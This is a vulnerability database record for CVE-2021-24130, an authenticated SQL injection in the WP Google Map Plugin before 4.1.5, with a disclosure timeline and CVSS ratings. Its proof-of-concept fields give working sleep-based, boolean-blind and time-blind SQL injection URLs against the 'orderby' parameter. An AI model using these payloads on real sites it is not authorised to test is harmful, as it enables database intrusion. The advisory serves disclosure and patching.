DATABASE RESOURCES PRICING ABOUT US

{"id": "WPEX-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n", "published": "2020-11-25T00:00:00", "modified": "2021-02-01T11:01:42", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Nguyen Anh Tien", "references": ["https://plugins.trac.wordpress.org/changeset/2463467/wp-google-map-plugin"], "cvelist": ["CVE-2021-24130"], "lastseen": "2021-02-15T22:32:03", "viewCount": 109, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24130"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24130"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "- Vulnerable parameters: `order` and `orderby`\r\n\r\n1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))\r\n\r\n2. The request will be delayed by 10 seconds.\r\n\r\n---\r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: Boolean-based blind - Parameter replace (original value)\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 time-based blind - Parameter replace\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)\r\n---\r\n", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645979108}}

{"cve": [{"lastseen": "2022-03-23T14:47:23", "description": "Unvalidated input in the WP Google Map Plugin WordPress plugin, versions before 4.1.5, in the Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+).", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24130", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24130"], "modified": "2021-03-24T17:11:00", "cpe": [], "id": "CVE-2021-24130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24130", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n\n### PoC\n\n\\- Vulnerable parameters: `order` and `orderby` 1\\. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&amp;order;=desc&amp;orderby;=(sleep(5)) 2\\. The request will be delayed by 10 seconds. \\--- Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&amp;order;=asc&amp;orderby;=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&amp;order;=asc&amp;orderby;=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END) \\--- \n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "https://wpscan.com/vulnerability/46af9a4d-67ac-4e08-a753-a2a44245f4f8", "type": "wpvulndb", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}]}